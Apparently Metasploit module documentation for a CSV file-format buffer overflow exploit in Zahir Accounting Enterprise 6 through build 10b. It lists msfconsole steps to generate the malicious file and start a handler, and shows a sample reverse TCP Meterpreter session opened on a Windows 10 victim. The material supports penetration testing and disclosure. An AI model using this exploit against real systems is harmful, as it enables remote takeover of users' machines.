## Description

Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file.

## Vulnerable Application

[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b

[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip)

## Verification Steps

1. `./msfconsole -q`
2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv`
3. `run`
4. `handler -p <payload> -H <lhost> -P <lport>`
5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process
6. Get a session

## Scenarios

### Zahir Enterprise 6 build 10b on Windows 10 x64

```
msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > 
[*] Started reverse TCP handler on 172.22.222.130:4444 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500
sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```
